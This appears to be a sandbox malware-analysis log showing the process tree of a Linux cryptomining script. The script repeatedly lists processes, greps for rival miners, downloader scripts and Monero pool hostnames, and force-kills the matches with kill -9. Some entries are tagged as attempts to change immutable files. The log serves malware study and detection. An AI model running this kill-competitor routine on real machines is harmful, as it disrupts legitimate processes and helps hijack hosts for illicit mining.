/bin/grepgrep wget2⤵PID:2351
/bin/grepgrep mr.sh2⤵PID:2350
/bin/grepgrep -v grep2⤵PID:2349
/bin/psps aux2⤵PID:2348
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2359
/usr/bin/awkawk "{print \$2}"2⤵PID:2358
/bin/grepgrep curl2⤵PID:2357
/bin/grepgrep mr.sh2⤵PID:2356
/bin/grepgrep -v grep2⤵PID:2355
/bin/psps aux2⤵
- Reads CPU attributes
PID:2354 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2365
/usr/bin/awkawk "{print \$2}"2⤵PID:2364
/bin/grepgrep wget2⤵PID:2363
/bin/grepgrep 2mr.sh2⤵PID:2362
/bin/grepgrep -v grep2⤵PID:2361
/bin/psps aux2⤵
- Reads runtime system information
PID:2360 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2371
/usr/bin/awkawk "{print \$2}"2⤵PID:2370
/bin/grepgrep curl2⤵PID:2369
/bin/grepgrep 2mr.sh2⤵PID:2368
/bin/grepgrep -v grep2⤵PID:2367
/bin/psps aux2⤵PID:2366
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2377 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2376
/bin/grepgrep wget2⤵PID:2375
/bin/grepgrep cr5.sh2⤵PID:2374
/bin/grepgrep -v grep2⤵PID:2373
/bin/psps aux2⤵PID:2372
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2383
/usr/bin/awkawk "{print \$2}"2⤵PID:2382
/bin/grepgrep curl2⤵PID:2381
/bin/grepgrep cr5.sh2⤵PID:2380
/bin/grepgrep -v grep2⤵PID:2379
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2378 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2389 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2388
/bin/grepgrep wget2⤵PID:2387
/bin/grepgrep logo9.jpg2⤵PID:2386
/bin/grepgrep -v grep2⤵PID:2385
/bin/psps aux2⤵PID:2384
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2395
/usr/bin/awkawk "{print \$2}"2⤵PID:2394
/bin/grepgrep curl2⤵PID:2393
/bin/grepgrep logo9.jpg2⤵PID:2392
/bin/grepgrep -v grep2⤵PID:2391
/bin/psps aux2⤵PID:2390
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2400
/usr/bin/awkawk "{print \$2}"2⤵PID:2399
/bin/grepgrep j2.conf2⤵PID:2398
/bin/grepgrep -v grep2⤵PID:2397
/bin/psps aux2⤵PID:2396
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2406
/usr/bin/awkawk "{print \$2}"2⤵PID:2405
/bin/grepgrep wget2⤵PID:2404
/bin/grepgrep luk-cpu2⤵PID:2403
/bin/grepgrep -v grep2⤵PID:2402
/bin/psps aux2⤵PID:2401
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2412 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2411
/bin/grepgrep curl2⤵PID:2410
/bin/grepgrep luk-cpu2⤵PID:2409
/bin/grepgrep -v grep2⤵PID:2408
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2407 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2418
/usr/bin/awkawk "{print \$2}"2⤵PID:2417
/bin/grepgrep wget2⤵PID:2416
/bin/grepgrep ficov2⤵PID:2415
/bin/grepgrep -v grep2⤵PID:2414
/bin/psps aux2⤵
- Reads runtime system information
PID:2413 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2424
/usr/bin/awkawk "{print \$2}"2⤵PID:2423
/bin/grepgrep curl2⤵PID:2422
/bin/grepgrep ficov2⤵PID:2421
/bin/grepgrep -v grep2⤵PID:2420
/bin/psps aux2⤵
- Reads CPU attributes
PID:2419 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2430
/usr/bin/awkawk "{print \$2}"2⤵PID:2429
/bin/grepgrep wget2⤵PID:2428
/bin/grepgrep he.sh2⤵PID:2427
/bin/grepgrep -v grep2⤵PID:2426
/bin/psps aux2⤵
- Reads runtime system information
PID:2425 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2436
/usr/bin/awkawk "{print \$2}"2⤵PID:2435
/bin/grepgrep curl2⤵PID:2434
/bin/grepgrep he.sh2⤵PID:2433
/bin/grepgrep -v grep2⤵PID:2432
/bin/psps aux2⤵PID:2431
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2442
/usr/bin/awkawk "{print \$2}"2⤵PID:2441
/bin/grepgrep wget2⤵PID:2440
/bin/grepgrep miner.sh2⤵PID:2439
/bin/grepgrep -v grep2⤵PID:2438
/bin/psps aux2⤵PID:2437
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2448
/usr/bin/awkawk "{print \$2}"2⤵PID:2447
/bin/grepgrep curl2⤵PID:2446
/bin/grepgrep miner.sh2⤵PID:2445
/bin/grepgrep -v grep2⤵PID:2444
/bin/psps aux2⤵PID:2443
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2454
/usr/bin/awkawk "{print \$2}"2⤵PID:2453
/bin/grepgrep wget2⤵PID:2452
/bin/grepgrep nullcrew2⤵PID:2451
/bin/grepgrep -v grep2⤵PID:2450
/bin/psps aux2⤵
- Reads runtime system information
PID:2449 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2460 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2459
/bin/grepgrep curl2⤵PID:2458
/bin/grepgrep nullcrew2⤵PID:2457
/bin/grepgrep -v grep2⤵PID:2456
/bin/psps aux2⤵
- Reads CPU attributes
PID:2455 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2465
/usr/bin/awkawk "{print \$2}"2⤵PID:2464
/bin/grepgrep -v grep2⤵PID:2462
/bin/psps aux2⤵
- Reads runtime system information
PID:2461 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2470
/usr/bin/awkawk "{print \$2}"2⤵PID:2469
/bin/grepgrep -v grep2⤵PID:2467
/bin/psps aux2⤵PID:2466
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2475
/usr/bin/awkawk "{print \$2}"2⤵PID:2474
/bin/grepgrep -v grep2⤵PID:2472
/bin/psps aux2⤵PID:2471
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2480
/usr/bin/awkawk "{print \$2}"2⤵PID:2479
/bin/grepgrep -v grep2⤵PID:2477
/bin/psps aux2⤵
- Reads runtime system information
PID:2476 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2485 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2484
/bin/grepgrep -v grep2⤵PID:2482
/bin/psps aux2⤵PID:2481
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2490 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2489
/bin/grepgrep -v grep2⤵PID:2487
/bin/psps aux2⤵PID:2486
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2495
/usr/bin/awkawk "{print \$2}"2⤵PID:2494
/bin/grepgrep mine.moneropool.com2⤵PID:2493
/bin/grepgrep -v grep2⤵PID:2492
/bin/psps auxf2⤵PID:2491
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2500
/usr/bin/awkawk "{print \$2}"2⤵PID:2499
/bin/grepgrep pool.t00ls.ru2⤵PID:2498
/bin/grepgrep -v grep2⤵PID:2497
/bin/psps auxf2⤵
- Reads CPU attributes
PID:2496 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2505
/usr/bin/awkawk "{print \$2}"2⤵PID:2504
/bin/grepgrep -v grep2⤵PID:2502
/bin/psps auxf2⤵
- Reads runtime system information
PID:2501 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2510 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2509
/bin/grepgrep -v grep2⤵PID:2507
/bin/psps auxf2⤵PID:2506
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2515 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2514
/bin/grepgrep -v grep2⤵PID:2512
/bin/psps auxf2⤵PID:2511
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2520
/usr/bin/awkawk "{print \$2}"2⤵PID:2519
/bin/grepgrep monerohash.com2⤵PID:2518
/bin/grepgrep -v grep2⤵PID:2517
/bin/psps auxf2⤵
- Reads runtime system information
PID:2516 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2525
/usr/bin/awkawk "{print \$2}"2⤵PID:2524
/bin/grepgrep /tmp/a7b104c2702⤵PID:2523
/bin/grepgrep -v grep2⤵PID:2522
/bin/psps auxf2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2521 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2530
/usr/bin/awkawk "{print \$2}"2⤵PID:2529
/bin/grepgrep -v grep2⤵PID:2527
/bin/psps auxf2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2526 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2535 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2534
/bin/grepgrep -v grep2⤵PID:2532
/bin/psps auxf2⤵PID:2531
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2540
/usr/bin/awkawk "{print \$2}"2⤵PID:2539
/bin/grepgrep -v grep2⤵PID:2537
/bin/psps auxf2⤵
- Reads CPU attributes
PID:2536 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2545
/usr/bin/awkawk "{print \$2}"2⤵PID:2544
/bin/grepgrep -v grep2⤵PID:2542
/bin/psps auxf2⤵PID:2541
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2550 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2549
/bin/grepgrep xmrpool.eu2⤵PID:2548
/bin/grepgrep -v grep2⤵PID:2547
/bin/psps auxf2⤵PID:2546
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2554 -
/usr/local/sbin/killkill -9 25523⤵PID:2555
/usr/local/bin/killkill -9 25523⤵PID:2555
/usr/sbin/killkill -9 25523⤵PID:2555
/usr/bin/awkawk "{print \$2}"2⤵PID:2553
/bin/grepgrep xiaoyao2⤵PID:2552
/bin/psps auxf2⤵PID:2551
MITRE ATT&CK Enterprise v15
Replay Monitor
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